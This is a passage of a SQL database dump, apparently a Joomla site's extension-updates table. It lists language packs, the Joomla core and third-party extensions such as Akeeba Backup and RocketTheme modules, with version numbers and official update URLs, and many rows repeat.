R_details.xml','',''),(19290,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19291,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19292,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19293,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19294,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19295,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19296,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19297,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19298,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19299,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19300,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19301,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19302,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19303,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19304,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19305,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19306,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19307,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19308,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19309,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19310,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19311,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19312,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19313,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19314,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19315,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19316,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19317,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19318,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19319,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19320,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19321,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19322,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19323,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19324,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19325,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19326,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19327,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19328,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19329,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19330,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19331,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19332,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19333,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19334,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19335,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19336,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19337,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19338,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19339,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19340,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19341,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19342,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19343,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19344,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19345,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19346,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19347,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19348,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19349,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19350,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19351,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19352,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19353,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19354,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19355,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19356,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19357,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19358,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19359,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19360,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19361,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19362,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19363,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19364,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19365,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19366,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19367,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19368,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19369,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19370,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19371,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19372,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19373,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19374,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19375,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19376,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19377,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19378,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19379,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19380,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19381,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19382,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19383,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19384,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19385,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19386,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19387,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19388,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19389,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19390,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19391,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19392,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19393,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19394,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19395,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19396,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19397,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19398,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19399,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19400,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19401,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19402,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19403,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19404,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19405,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19406,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19407,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19408,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19409,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19410,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19411,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19412,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19413,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19414,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19415,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19416,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19417,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19418,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19419,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19420,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19421,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19422,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19423,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19424,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19425,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19426,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19427,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19428,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19429,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19430,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19431,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19432,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19433,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19434,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19435,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19436,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19437,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19438,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19439,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19440,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19441,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19442,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19443,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19444,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19445,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19446,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19447,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19448,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19449,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19450,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19451,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19452,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19453,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19454,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19455,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19456,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19457,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19458,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19459,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19460,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19461,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19462,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19463,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19464,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19465,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19466,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19467,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19468,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19469,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19470,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19471,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19472,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19473,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19474,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19475,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19476,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19477,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19478,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19479,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19480,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19481,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19482,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19483,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19484,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19485,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19486,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19487,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19488,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19489,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19490,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19491,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19492,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19493,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19494,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19495,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19496,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19497,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19498,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19499,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19500,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19501,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19502,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19503,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19504,67,0,'Akeeba Backup Core 